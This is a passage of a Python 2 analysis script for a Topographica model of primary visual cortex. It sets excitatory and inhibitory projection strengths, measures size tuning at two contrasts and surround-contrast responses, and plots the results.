topo.sim["V1ComplexInh"].output_fns[1].t*=0
topo.sim["V1ComplexInh"].output_fns[1].t+=d
topo.sim["V1ComplexInh"].output_fns[1].gain=e
topo.sim["V1ComplexInh"].projections()["LongEI"].strength=f
topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=g
par = "_" + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f)+ "_" + str(g) + ".png"
plot_size_tuning(par)
def set_parameters(a,b,c,d,e,f,g,h,i,j,k,l,m):
print a,b,c,d,e,f,g,h,i,j,k,l,m
topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
topo.sim["V1Complex"].projections()["LongEE"].strength=d
topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
topo.sim["V1Complex"].projections()["LocalIE"].strength=f
topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
topo.sim["V1Complex"].projections()["LocalEE"].strength=i
topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
topo.sim["V1Complex"].output_fns[1].t*=0
topo.sim["V1Complex"].output_fns[1].t+=k
topo.sim["V1ComplexInh"].output_fns[1].t*=0
topo.sim["V1ComplexInh"].output_fns[1].t+=l
topo.sim["V1ComplexInh"].output_fns[1].gain=m
def check_activity(a,b,c,d,e,f,g,h,i,j,k,l,m):
print a,b,c,d,e,f,g,h,i,j,k,l,m
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
#topo.sim["V1Complex"].projections()["LongEE"].strength=d
#topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
#topo.sim["V1Complex"].projections()["LocalIE"].strength=f
#topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
#topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
#topo.sim["V1Complex"].projections()["LocalEE"].strength=i
#topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
#topo.sim["V1Complex"].output_fns[1].t*=0
#topo.sim["V1Complex"].output_fns[1].t+=k
#topo.sim["V1ComplexInh"].output_fns[1].t*=0
#topo.sim["V1ComplexInh"].output_fns[1].t+=l
#topo.sim["V1ComplexInh"].output_fns[1].gain=m
par = "_" + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f) + "_" + str(g) + "_" + str(h) + "_" + str(i) + "_" + str(j) + "_" + str(k) + "_" + str(l)+ "_" + str(m) +".png"
plot_neural_dynamics(par)
def make_full_analysis(a,b,c,d,e,f,g,h,i,j,k,l,m):
import topo
print a,b,c,d,e,f,g,h,i,j,k,l,m
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
#topo.sim["V1Complex"].projections()["LongEE"].strength=d
#topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
#topo.sim["V1Complex"].projections()["LocalIE"].strength=f
#topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
#topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
#topo.sim["V1Complex"].projections()["LocalEE"].strength=i
#topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
#topo.sim["V1Complex"].output_fns[1].t*=0
#topo.sim["V1Complex"].output_fns[1].t+=k
#topo.sim["V1ComplexInh"].output_fns[1].t*=0
#topo.sim["V1ComplexInh"].output_fns[1].t+=l
#topo.sim["V1ComplexInh"].output_fns[1].gain=m
#topo.sim['V1Simple'].output_fns[0].old_a*=0
#topo.sim['V1Complex'].output_fns[0].old_a*=0
#topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
from topo.analysis.featureresponses import MeasureResponseCommand, FeatureMaps, SinusoidalMeasureResponseCommand,FeatureCurveCommand
FeatureMaps.num_orientation=16
MeasureResponseCommand.scale=1.0
SinusoidalMeasureResponseCommand.frequencies=[2.4]
FeatureCurveCommand.num_orientation=16
MeasureResponseCommand.duration=4.0
FeatureCurveCommand.curve_parameters=[{"contrast":40},{"contrast":50},{"contrast":90}]
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
wipe_out_activity()
clear_event_queue()
par = 'Analysis:' + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f) + "_" + str(g) + "_" + str(h) + "_" + str(i) + "_" + str(j) + "_" + str(k) + "_" + str(l) + "_" + str(m)
#d = os.path.dirname(par)
if not os.path.exists(par):
os.makedirs(par)
normalize_path.prefix = par
#plot_neural_dynamics('neural_dynamics.png')
import contrib.surround_analysis
from topo.analysis.featureresponses import SinusoidalMeasureResponseCommand,FeatureCurveCommand
from topo.base.projection import ProjectionSheet
from topo.sheet import GeneratorSheet
import contrib.jacommands
import contrib.surround_analysis
exec "from topo.analysis.vision import analyze_complexity" in __main__.__dict__
from topo.analysis.featureresponses import PatternPresenter
PatternPresenter.duration=4.0
import topo.command.pylabplot
reload(topo.command.pylabplot)
#contrib.surround_analysis.run_dynamics_analysis(0.0,0.0,0.7,__main__.__dict__.get("analysis_scale",0.3))
#PatternPresenter.duration=4.0
#a = topo.command.pylabplot.measure_or_tuning_fullfield.instance(sheet=topo.sim["V1Complex"])
#a.duration=4.0
#a()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0]",sheet=topo.sim["V1Complex"],coords=[(0,0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,0.1]",sheet=topo.sim["V1Complex"],coords=[(0.1,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,-0.1]",sheet=topo.sim["V1Complex"],coords=[(0.1,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,0.1]",sheet=topo.sim["V1Complex"],coords=[(-0.1,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,-0.1]",sheet=topo.sim["V1Complex"],coords=[(-0.1,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.2,0.2]",sheet=topo.sim["V1Complex"],coords=[(0.2,0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.2,-0.2]",sheet=topo.sim["V1Complex"],coords=[(0.2,-0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.2,0.2]",sheet=topo.sim["V1Complex"],coords=[(-0.2,0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.2,-0.2]",sheet=topo.sim["V1Complex"],coords=[(-0.2,-0.2)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.1]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.1]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.1)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.1,0]",sheet=topo.sim["V1Complex"],coords=[(-0.1,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.1,0]",sheet=topo.sim["V1Complex"],coords=[(0.1,-0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,0.3]",sheet=topo.sim["V1Complex"],coords=[(0.3,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,-0.3]",sheet=topo.sim["V1Complex"],coords=[(0.3,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,0.3]",sheet=topo.sim["V1Complex"],coords=[(-0.3,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,-0.3]",sheet=topo.sim["V1Complex"],coords=[(-0.3,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,0.24]",sheet=topo.sim["V1Complex"],coords=[(0.25,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,-0.24]",sheet=topo.sim["V1Complex"],coords=[(0.25,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,0.24]",sheet=topo.sim["V1Complex"],coords=[(-0.25,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,-0.24]",sheet=topo.sim["V1Complex"],coords=[(-0.25,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.24]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.24]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.25)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.24,0]",sheet=topo.sim["V1Complex"],coords=[(-0.25,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.24,0]",sheet=topo.sim["V1Complex"],coords=[(0.25,-0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,0.3]",sheet=topo.sim["V1Complex"],coords=[(0.0,0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0,-0.3]",sheet=topo.sim["V1Complex"],coords=[(0.0,-0.3)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[-0.3,0]",sheet=topo.sim["V1Complex"],coords=[(-0.3,0.0)])()
#topo.command.pylabplot.cyclic_tuning_curve.instance(x_axis="orientation",filename="ORTC[0.3,0]",sheet=topo.sim["V1Complex"],coords=[(0.3,-0.0)])()
#contrib.surround_analysis.surround_analysis().analyse([(0,0),(1.0,0.0),(0.0,1.0),(-1.0,0.0),(0.0,-1.0),(1.0,1.0),(-1.0,1.0),(1.0,-1.0),(-1.0,-1.0)],12,15)
normalize_path.prefix = './D-with-lowhighcontrast'
if not os.path.exists(normalize_path.prefix):
os.makedirs(normalize_path.prefix)
contrib.surround_analysis.surround_analysis().analyse([(0,0)],12,15)
def plot_size_tuning(params):
sheet_names=["V1Complex"]
prefix="/home/jan/topographica/ActivityExploration/"
from topo.command.basic import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
import pylab
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
x = 0
y = 0.06
(X,Y) = topo.sim["V1Complex"].sheet2matrixidx(x,y)
(Xl,Yl) = topo.sim["LGNOn"].sheet2matrixidx(x,y)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#orr=numpy.pi*topo.sim["V1Complex"].sheet_views["OrientationPreference"].view()[0][X][Y]
#phase = 2*numpy.pi*topo.sim["V1Simple"].sheet_views["PhasePreference"].view()[0][X][Y]
orr =0
phase =0
stc_e_hc = []
stc_i_hc = []
stc_LongEE_hc = []
stc_LocalEE_hc = []
stc_LocalIE_hc = []
stc_Aff_hc = []
LGN_hc = []
V1S_hc = []
num_sizes = 50
max_size = 1.3
for size in xrange(0,num_sizes):
size = float(size)/num_sizes*max_size
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=orr,phase=phase,size=size,scale=1.0,x=x,y=y,frequency=2.4))
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim.run(4.0)
stc_e_hc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_i_hc.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
LGN_hc.append(topo.sim["LGNOn"].activity[Xl,Yl].copy())
V1S_hc.append(topo.sim["V1Simple"].activity[X,Y].copy())
stc_Aff_hc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_LongEE_hc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_LocalEE_hc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_LocalIE_hc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
stc_e_lc = []
stc_i_lc = []
stc_LongEE_lc = []
stc_LocalEE_lc = []
stc_LocalIE_lc = []
stc_Aff_lc = []
LGN_lc = []
V1S_lc = []
sizes=[]
for size in xrange(0,num_sizes):
size = float(size)/num_sizes*max_size
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=orr,phase=phase,size=size,scale=0.3,x=x,y=y,frequency=2.4))
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim.run(4.0)
stc_e_lc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_i_lc.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
LGN_lc.append(topo.sim["LGNOn"].activity[Xl,Yl].copy())
V1S_lc.append(topo.sim["V1Simple"].activity[X,Y].copy())
stc_Aff_lc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_LongEE_lc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_LocalEE_lc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_LocalIE_lc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
sizes.append(size)
pylab.figure(figsize=(20,15))
pylab.subplot(6,1,1)
pylab.plot(sizes,stc_e_lc,'ro',label='exc lc')
pylab.plot(sizes,stc_e_lc,'r')
pylab.plot(sizes,stc_i_lc,'bo',label='inh lc')
pylab.plot(sizes,stc_i_lc,'b')
pylab.plot(sizes,stc_e_hc,'r+',label='exc hc')
pylab.plot(sizes,stc_e_hc,'r')
pylab.plot(sizes,stc_i_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_i_hc,'b')
pylab.legend()
pylab.subplot(6,1,2)
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc)+numpy.array(stc_LocalEE_lc),'ro',label='exc lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc)+numpy.array(stc_LocalEE_lc),'r')
pylab.plot(sizes,stc_LocalIE_lc,'bo',label='ing lc')
pylab.plot(sizes,stc_LocalIE_lc,'b')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc)+numpy.array(stc_LocalEE_hc),'r+',label='exc hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc)+numpy.array(stc_LocalEE_hc),'r')
pylab.plot(sizes,stc_LocalIE_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_LocalIE_hc,'b')
pylab.legend()
pylab.subplot(6,1,3)
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc),'ro',label='exc lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc)+numpy.array(stc_LongEE_lc),'r')
pylab.plot(sizes,stc_LocalIE_lc,'bo',label='ing lc')
pylab.plot(sizes,stc_LocalIE_lc,'b')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc),'r+',label='exc hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc)+numpy.array(stc_LongEE_hc),'r')
pylab.plot(sizes,stc_LocalIE_hc,'b+',label='inh hc')
pylab.plot(sizes,stc_LocalIE_hc,'b')
pylab.legend()
pylab.subplot(6,1,4)
pylab.plot(sizes,numpy.array(stc_Aff_lc),'ko',label='aff lc')
pylab.plot(sizes,numpy.array(stc_Aff_lc),'k')
pylab.plot(sizes,numpy.array(stc_LongEE_lc),'kx',label='long lc')
pylab.plot(sizes,numpy.array(stc_LongEE_lc),'k')
pylab.plot(sizes,numpy.array(stc_LocalEE_lc)/10,'k*',label='local lc')
pylab.plot(sizes,numpy.array(stc_LocalEE_lc)/10,'k')
pylab.plot(sizes,numpy.array(stc_Aff_hc),'go',label='aff hc')
pylab.plot(sizes,numpy.array(stc_Aff_hc),'g')
pylab.plot(sizes,numpy.array(stc_LongEE_hc),'gx',label='long hc')
pylab.plot(sizes,numpy.array(stc_LongEE_hc),'g')
pylab.plot(sizes,numpy.array(stc_LocalEE_hc)/10,'g*',label='local hc')
pylab.plot(sizes,numpy.array(stc_LocalEE_hc)/10,'g')
pylab.legend()
pylab.subplot(6,1,5)
pylab.plot(sizes,numpy.array(V1S_lc),'ko',label='V1S lc')
pylab.plot(sizes,numpy.array(V1S_lc),'k')
pylab.plot(sizes,numpy.array(V1S_hc),'go',label='V1S hc')
pylab.plot(sizes,numpy.array(V1S_hc),'g')
pylab.legend()
pylab.subplot(6,1,6)
pylab.plot(sizes,numpy.array(LGN_lc),'ko',label='LGN lc')
pylab.plot(sizes,numpy.array(LGN_lc),'k')
pylab.plot(sizes,numpy.array(LGN_hc),'go',label='LGN hc')
pylab.plot(sizes,numpy.array(LGN_hc),'g')
pylab.legend()
pylab.savefig(prefix+ params);
def plot_neural_dynamics(params):
sheet_names=["V1Complex"]
ip = topo.sim['Retina'].input_generator
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=10,scale=1.0,x=0.0,y=0.0,frequency=2.4))
from topo.pattern import OrientationContrast
from topo.command import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.pattern import OrientationContrast
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
import pylab
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
V1Splastic = topo.sim["V1Simple"].plastic
V1Cplastic = topo.sim["V1Complex"].plastic
V1CInhplastic = topo.sim["V1ComplexInh"].plastic
topo.sim["V1Simple"].plastic = False
topo.sim["V1Complex"].plastic = False
topo.sim["V1ComplexInh"].plastic = False
prefix="/home/jan/topographica/ActivityExploration/"
topo.sim.state_push()
from topo.command import pattern_present
from topo.base.functionfamily import PatternDrivenAnalysis
from topo.pattern import OrientationContrast
from topo.analysis.featureresponses import PatternPresenter
from topo.base.sheet import Sheet
data={}
for key in sheet_names:
data[key] = {}
for i in topo.sim[key].projections().keys():
data[key][i]=[]
data[key]["act"]=[]
(X,Y) = topo.sim["V1Complex"].sheet2matrixidx(0.0,0.0)
LateralOrientationAnnisotropy()
#return
for i in xrange(0,100):
topo.sim.run(0.05)
for key in sheet_names:
for i in topo.sim[key].projections().keys():
data[key][i].append(topo.sim[key].projections()[i].activity.copy())
data[key]["act"].append(topo.sim[key].activity.copy())
acts = topo.sim["V1Simple"].activity.copy()
actc = topo.sim["V1Complex"].activity.copy()
topo.sim.state_pop()
m = numpy.argmax(data["V1Complex"]["act"][-1])
#(X,Y) = numpy.unravel_index(m, data["V1Complex"]["act"][-1].shape)
orr=numpy.pi*topo.sim["V1Complex"].sheet_views["OrientationPreference"].view()[0][X][Y]
phase = 2*numpy.pi*topo.sim["V1Complex"].sheet_views["PhasePreference"].view()[0][X][Y]
print X,Y
pylab.figure(figsize=(20,15))
pylab.subplot(5,3,1)
pylab.title(prefix+sheet_names[0]+" [" + str(X) + "," +str(Y) + "]")
for projname in data[sheet_names[0]].keys():
a = []
for act in data[sheet_names[0]][projname]:
a.append(act[X,Y])
pylab.plot(a,label=projname)
#pylab.legend(loc='upper left')
pylab.subplot(5,3,2)
pylab.imshow(acts)
pylab.colorbar()
pylab.subplot(5,3,3)
pylab.imshow(actc)
pylab.colorbar()
(xx,yy) = topo.sim["V1Complex"].matrixidx2sheet(X,Y)
# now lets collect the size tuning
step_size=0.2
stc_lc = []
stc_aff_lc = []
stc_lr_exc_lc = []
stc_sr_exc_lc = []
stc_sr_inh_lc = []
for i in xrange(0,10):
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=i*step_size,scale=0.3,x=xx,y=yy,frequency=2.4))
topo.sim.state_push()
topo.sim.run(2.0)
stc_lc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_aff_lc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_lr_exc_lc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_sr_exc_lc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_sr_inh_lc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
stc_hc = []
stc_aff_hc = []
stc_lr_exc_hc = []
stc_sr_exc_hc = []
stc_sr_inh_hc = []
for i in xrange(0,10):
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim['Retina'].set_input_generator(SineGratingDiskTemp(orientation=0.0,phase=0.0,size=i*step_size,scale=1.0,x=xx,y=yy,frequency=2.4))
topo.sim.state_push()
topo.sim.run(2.0)
stc_hc.append(topo.sim["V1Complex"].activity[X,Y].copy())
stc_aff_hc.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
stc_lr_exc_hc.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
stc_sr_exc_hc.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
stc_sr_inh_hc.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
topo.sim.state_pop()
# lets do the surround contrast analysis
cs = 0.6
scale=1.0
colinear = OrientationContrast(orientationcenter=orr,orientationsurround=orr,sizecenter=cs,sizesurround=4.0,thickness=4.0-cs,scalecenter=scale,scalesurround=scale,x=xx,y=yy,frequency=__main__.__dict__.get('FREQ',2.4),phase=phase)
orthogonal = OrientationContrast(orientationcenter=orr,orientationsurround=orr+numpy.pi/2,sizecenter=cs,sizesurround=4.0,thickness=4.0-cs,scalecenter=scale,scalesurround=scale,x=xx,y=yy,frequency=__main__.__dict__.get('FREQ',2.4),phase=phase)
ortc_or = []
ortc_aff_or = []
ortc_lr_exc_or = []
ortc_sr_exc_or = []
ortc_sr_inh_or = []
inh_ortc_or = []
inh_ortc_lr_exc_or = []
inh_ortc_sr_exc_or = []
inh_ortc_sr_inh_or = []
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim['Retina'].set_input_generator(orthogonal)
for i in xrange(0,80):
topo.sim.run(0.05)
ortc_or.append(topo.sim["V1Complex"].activity[X,Y].copy())
ortc_aff_or.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
ortc_lr_exc_or.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
ortc_sr_exc_or.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
ortc_sr_inh_or.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
inh_ortc_or.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
inh_ortc_lr_exc_or.append(topo.sim["V1ComplexInh"].projections()["LongEI"].activity[X,Y].copy())
inh_ortc_sr_exc_or.append(topo.sim["V1ComplexInh"].projections()["LocalEI"].activity[X,Y].copy())
inh_ortc_sr_inh_or.append(topo.sim["V1ComplexInh"].projections()["LocalII"].activity[X,Y].copy())
ortc_or_V1Complex_act = topo.sim["V1Complex"].activity.copy()
ortc_or_V1Simple_act = topo.sim["V1Simple"].activity.copy()
ortc_or_LGNOn_act = topo.sim["LGNOn"].activity.copy()
inh_ortc_or_V1Complex_act = topo.sim["V1ComplexInh"].activity.copy()
topo.sim.state_pop()
ortc_cl = []
ortc_aff_cl = []
ortc_lr_exc_cl = []
ortc_sr_exc_cl = []
ortc_sr_inh_cl = []
inh_ortc_cl = []
inh_ortc_lr_exc_cl = []
inh_ortc_sr_exc_cl = []
inh_ortc_sr_inh_cl = []
topo.sim['V1Simple'].output_fns[0].old_a*=0
topo.sim['V1Complex'].output_fns[0].old_a*=0
topo.sim['V1ComplexInh'].output_fns[0].old_a*=0
wipe_out_activity()
clear_event_queue()
topo.sim.state_push()
topo.sim['Retina'].set_input_generator(colinear)
for i in xrange(0,80):
topo.sim.run(0.05)
ortc_cl.append(topo.sim["V1Complex"].activity[X,Y].copy())
ortc_aff_cl.append(topo.sim["V1Complex"].projections()["V1SimpleAfferent"].activity[X,Y].copy())
ortc_lr_exc_cl.append(topo.sim["V1Complex"].projections()["LongEE"].activity[X,Y].copy())
ortc_sr_exc_cl.append(topo.sim["V1Complex"].projections()["LocalEE"].activity[X,Y].copy())
ortc_sr_inh_cl.append(topo.sim["V1Complex"].projections()["LocalIE"].activity[X,Y].copy())
inh_ortc_cl.append(topo.sim["V1ComplexInh"].activity[X,Y].copy())
inh_ortc_lr_exc_cl.append(topo.sim["V1ComplexInh"].projections()["LongEI"].activity[X,Y].copy())
inh_ortc_sr_exc_cl.append(topo.sim["V1ComplexInh"].projections()["LocalEI"].activity[X,Y].copy())
inh_ortc_sr_inh_cl.append(topo.sim["V1ComplexInh"].projections()["LocalII"].activity[X,Y].copy())
ortc_cl_V1Complex_act = topo.sim["V1Complex"].activity.copy()
ortc_cl_V1Simple_act = topo.sim["V1Simple"].activity.copy()
ortc_cl_LGNOn_act = topo.sim["LGNOn"].activity.copy()
inh_ortc_cl_V1Complex_act = topo.sim["V1ComplexInh"].activity.copy()
topo.sim.state_pop()
pylab.subplot(5,3,4)
pylab.plot(stc_lc,label='act')
pylab.plot(stc_aff_lc,label='aff')
pylab.plot(stc_lr_exc_lc,label='LongEE')
pylab.plot(stc_sr_exc_lc,label='ShortEE')
pylab.plot(stc_sr_inh_lc,label='ShortIE')
pylab.plot(numpy.array(stc_sr_exc_lc)/(-1.0*numpy.array(stc_sr_inh_lc)+0.01)/10,label='E:I ratio')
# BUG FIX: the original wrote 'pylab.xlim=(0,20)', which assigns a tuple to
# the pylab.xlim *function attribute* (clobbering it and never setting the
# axis limits).  xlim must be called; fixed here and below.
pylab.xlim(0,20)
pylab.legend()
pylab.subplot(5,3,5)
pylab.plot(stc_hc,label='act')
pylab.plot(stc_aff_hc,label='aff')
pylab.plot(stc_lr_exc_hc,label='LongEE')
pylab.plot(stc_sr_exc_hc,label='ShortEE')
pylab.plot(stc_sr_inh_hc,label='ShortIE')
pylab.plot(numpy.array(stc_sr_exc_hc)/(-1.0*numpy.array(stc_sr_inh_hc)+0.01)/10,label='E:I ratio')
pylab.xlim(0,20)
pylab.legend()
pylab.subplot(5,3,6)
pylab.plot(stc_hc,label='act hc')
pylab.plot(stc_lc,label='act lc')
pylab.xlim(0,20)
pylab.legend()
pylab.subplot(5,3,7)
pylab.title('collinear')
pylab.plot(ortc_cl,label='act')
pylab.plot(ortc_aff_cl,label='aff')
pylab.plot(ortc_lr_exc_cl,label='LongEE')
pylab.plot(ortc_sr_exc_cl,label='ShortEE')
pylab.plot(ortc_sr_inh_cl,label='ShortIE')
pylab.xlim(0,60)
pylab.legend()
pylab.subplot(5,3,8)
pylab.title('orthogonal')
pylab.plot(ortc_or,label='act')
pylab.plot(ortc_aff_or,label='aff')
pylab.plot(ortc_lr_exc_or,label='LongEE')
pylab.plot(ortc_sr_exc_or,label='ShortEE')
pylab.plot(ortc_sr_inh_or,label='ShortIE')
pylab.xlim(0,60)
pylab.legend()
pylab.subplot(5,3,9)
pylab.title('collinear inh')
pylab.plot(inh_ortc_cl,label='act')
pylab.plot(inh_ortc_lr_exc_cl,label='LongEE')
pylab.plot(inh_ortc_sr_exc_cl,label='ShortEE')
pylab.plot(inh_ortc_sr_inh_cl,label='ShortIE')
pylab.xlim(0,60)
pylab.legend()
pylab.subplot(5,3,10)
pylab.title('orthogonal inh')
